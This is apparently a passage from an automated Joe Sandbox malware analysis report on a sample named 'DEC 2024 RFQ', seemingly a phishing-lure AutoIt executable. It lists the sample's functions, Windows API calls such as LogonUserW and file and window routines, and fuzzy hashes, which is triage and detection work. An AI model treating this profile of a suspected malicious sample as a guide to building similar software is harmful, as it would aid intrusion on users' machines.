                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2893107130-0
                                                                                                                      • Opcode ID: e96ae21db6c61fdc1e418b00b128361391c549515c1bba084c2796a15777c3f9
                                                                                                                      • Instruction ID: 4fddf80a56eb0f01d31c22f230af6670bf4b60c98f8bb59ea9d2a9d7366edfef
                                                                                                                      • Opcode Fuzzy Hash: e96ae21db6c61fdc1e418b00b128361391c549515c1bba084c2796a15777c3f9
                                                                                                                      • Instruction Fuzzy Hash: A921D232625610CBD329CF25E881A52B3E1EBA5321F688E6CD1F5CF2C0CE35A905CB54
                                                                                                                      Function 00084C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00084C4A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: mouse_event
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2434400541-0
                                                                                                                      • Opcode ID: 2edc7e4f81800860bcb5ca32736621800ead05256b0c74721138c06a91f173f2
                                                                                                                      • Instruction ID: 14a3e456007c6541facacc7db52fef66f18e14680d8467cc464fc6fd5fbad5b2
                                                                                                                      • Opcode Fuzzy Hash: 2edc7e4f81800860bcb5ca32736621800ead05256b0c74721138c06a91f173f2
                                                                                                                      • Instruction Fuzzy Hash: 37D05EA116560B78FCEC2B209E2FF7A018CF300782FD0814972818A1C2EDC45C405334
                                                                                                                      Function 000787B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00078389), ref: 000787D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LogonUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1244722697-0
                                                                                                                      • Opcode ID: 3a5463da9a0227678c840ae311c0b8bf845fe028d2e3d3f80935487788226c36
                                                                                                                      • Instruction ID: e18e4c36d1f743d5186b0e1ead8d6fbbdcb94de6c1fe4f1fdd30bb5488b639af
                                                                                                                      • Opcode Fuzzy Hash: 3a5463da9a0227678c840ae311c0b8bf845fe028d2e3d3f80935487788226c36
                                                                                                                      • Instruction Fuzzy Hash: 49D05E322A090EABEF018EA4DC01EBE3B69EB04B01F408111FE15C50A1C775D835AF60
                                                                                                                      Function 0004A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0004A12A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: 0bb39d376d1f8ef43fcbe03ac48761fadad4f7302f9007889786d5d61363de59
                                                                                                                      • Instruction ID: 1b875fd39ac93c63c5ac2bdcce6490b8030891be5f9fdd52e8e2afb2f633c5fe
                                                                                                                      • Opcode Fuzzy Hash: 0bb39d376d1f8ef43fcbe03ac48761fadad4f7302f9007889786d5d61363de59
                                                                                                                      • Instruction Fuzzy Hash: 38A0123100010DA78F001B81EC044547F5CD7011907004020F40C4002187B255104580
                                                                                                                      Function 00038808 Relevance: .6, Instructions: 590COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a6b34bc305015a33658becb955f63181b1a05b5d4a3799b99dddcf22289dede9
                                                                                                                      • Instruction ID: 6622831e838c258a027f79fe7966f4a067c01a989f8d1c2df9c62208af205bf6
                                                                                                                      • Opcode Fuzzy Hash: a6b34bc305015a33658becb955f63181b1a05b5d4a3799b99dddcf22289dede9
                                                                                                                      • Instruction Fuzzy Hash: CF223930904746CBEF7A8A14C8947BC77E5FB01306F68C0ABF94A87592DBB89D91C752
                                                                                                                      Function 000421C5 Relevance: .3, Instructions: 345COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                      • Instruction ID: 31731cf5088b15e9cd8d5235bb272289114cff16f718bffb33ab6f4ed098309c
                                                                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                      • Instruction Fuzzy Hash: 34C1A4B23050930ADFAD5639843417EFAE15FA27B135A077DE8B3CB1D4EE20C965D624
                                                                                                                      Function 000425FA Relevance: .3, Instructions: 341COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                      • Instruction ID: 07e33ba54b9681f26f16c620e1d64c922567508e87176c0cc926d571efba5136
                                                                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                      • Instruction Fuzzy Hash: 98C1A2B23091930ADFAD563AC43407EBAE15FA27F135A077DE4B2DB1D4EE20C964D624
                                                                                                                      Function 00041978 Relevance: .3, Instructions: 323COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                      • Instruction ID: 71c26b18795e866f1011ed9a877f1e2ee64c73c099ebf12f2913a84a50c2d904
                                                                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                      • Instruction Fuzzy Hash: E6C1A1F220519309DFAD5639C4741BEBBE19FA27B131A077DD4B2CB1C4EE20C9A5C664
                                                                                                                      Function 0173C820 Relevance: .1, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                      • Instruction ID: 4ba06447c493c584b59b955f866f91cd4f471a7a642248e650ed29b5c04205d0
                                                                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                      • Instruction Fuzzy Hash: 4241C371D1051CDBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB40
                                                                                                                      Function 0173C6B0 Relevance: .0, Instructions: 35COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                      • Instruction ID: bc962634b982e8a084a0d605542796d4e8cba32101691b2a93562b60da6bcfca
                                                                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                      • Instruction Fuzzy Hash: 22019279A11109EFCB45DF98C5909AEF7F5FB88310F20859ADC09A7346E730AE41DB80
                                                                                                                      Function 0173C710 Relevance: .0, Instructions: 35COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                      • Instruction ID: 0bb3ffc8f097224874cc510ff73176ca2c6d519672c04d8275c0b37a704ab6d2
                                                                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                      • Instruction Fuzzy Hash: BD019679A00109EFCB46DF98C5909ADF7F5FB88310F20859ADD19A7341D730AE51DB80
                                                                                                                      Function 0173B060 Relevance: .0, Instructions: 6COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                      Function 00097806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0009785B
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0009786D
                                                                                                                      • DestroyWindow.USER32 ref: 0009787B
                                                                                                                      • GetDesktopWindow.USER32 ref: 00097895
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0009789C
                                                                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 000979DD
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 000979ED
                                                                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097A35
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00097A41
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00097A7B
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097A9D
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097AB0
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097ABB
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00097AC4
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097AD3
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00097ADC
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097AE3
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00097AEE
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097B00
                                                                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,000B2CAC,00000000), ref: 00097B16
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00097B26
                                                                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00097B4C
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00097B6B
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097B8D
                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00097D7A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                      • Opcode ID: 9c0a7dac47a76183abb217b04cdf8ece6f411cc9328d8468d86b3622379f91e9
                                                                                                                      • Instruction ID: 9d41d4c2edd230787d92cd7734bd6c53c032a01327fb736fca6f7f2678fbf047
                                                                                                                      • Opcode Fuzzy Hash: 9c0a7dac47a76183abb217b04cdf8ece6f411cc9328d8468d86b3622379f91e9
                                                                                                                      • Instruction Fuzzy Hash: 15028A72910515EFEF14DFA4DD89EAE7BB9EF49310F048158F909AB2A1CB34AD01CB60
                                                                                                                      Function 000A356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?,000AF910), ref: 000A3627
                                                                                                                      • IsWindowVisible.USER32(?), ref: 000A364B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpperVisibleWindow
                                                                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                      • API String ID: 4105515805-45149045
                                                                                                                      • Opcode ID: 1b7c92220afcfb440fed29d20154714fa2dcb30fa6bfc966861a4e5d7f44291c
                                                                                                                      • Instruction ID: a19f31b5d10a562989652e1a543f7e83e9d30ae43f18a2e8825bf3b70111e090
                                                                                                                      • Opcode Fuzzy Hash: 1b7c92220afcfb440fed29d20154714fa2dcb30fa6bfc966861a4e5d7f44291c
                                                                                                                      • Instruction Fuzzy Hash: 2AD1C7702083119FCB14EF50C455AAE77E1AF56344F148469F88A6B3A3DF35DE0ACB96
                                                                                                                      Function 000AA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 000AA630
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000AA661
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 000AA66D
                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 000AA687
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 000AA696
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 000AA6C1
                                                                                                                      • GetSysColor.USER32(00000010), ref: 000AA6C9
                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 000AA6D0
                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 000AA6DF
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 000AA6E6
                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 000AA731
                                                                                                                      • FillRect.USER32(?,?,00000000), ref: 000AA763
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000AA78E
                                                                                                                        • Part of subcall function 000AA8CA: GetSysColor.USER32(00000012), ref: 000AA903
                                                                                                                        • Part of subcall function 000AA8CA: SetTextColor.GDI32(?,?), ref: 000AA907
                                                                                                                        • Part of subcall function 000AA8CA: GetSysColorBrush.USER32(0000000F), ref: 000AA91D
                                                                                                                        • Part of subcall function 000AA8CA: GetSysColor.USER32(0000000F), ref: 000AA928
                                                                                                                        • Part of subcall function 000AA8CA: GetSysColor.USER32(00000011), ref: 000AA945
                                                                                                                        • Part of subcall function 000AA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 000AA953
                                                                                                                        • Part of subcall function 000AA8CA: SelectObject.GDI32(?,00000000), ref: 000AA964
                                                                                                                        • Part of subcall function 000AA8CA: SetBkColor.GDI32(?,00000000), ref: 000AA96D
                                                                                                                        • Part of subcall function 000AA8CA: SelectObject.GDI32(?,?), ref: 000AA97A
                                                                                                                        • Part of subcall function 000AA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 000AA999
                                                                                                                        • Part of subcall function 000AA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000AA9B0
                                                                                                                        • Part of subcall function 000AA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 000AA9C5
                                                                                                                        • Part of subcall function 000AA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000AA9ED
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3521893082-0
                                                                                                                      • Opcode ID: 3b9a99138c5cb73c79af4052d509dff167da371326c6d4a16d93cc4b623a958f
                                                                                                                      • Instruction ID: e07283099faf9495aa7523544539ca330ae182e189d04fdc51f88dddca97db60
                                                                                                                      • Opcode Fuzzy Hash: 3b9a99138c5cb73c79af4052d509dff167da371326c6d4a16d93cc4b623a958f
                                                                                                                      • Instruction Fuzzy Hash: E9917F71508B02AFD7509FA4DC08E6B7BE9FF4A321F100B29F5A2961E1D739D944CB52
                                                                                                                      Function 00022C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?), ref: 00022CA2
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00022CE8
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00022CF3
                                                                                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00022CFE
                                                                                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00022D09
                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0005C43B
                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0005C474
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0005C89D
                                                                                                                        • Part of subcall function 00021B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00022036,?,00000000,?,?,?,?,000216CB,00000000,?), ref: 00021B9A
                                                                                                                      • SendMessageW.USER32(?,00001053), ref: 0005C8DA
                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0005C8F1
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0005C907
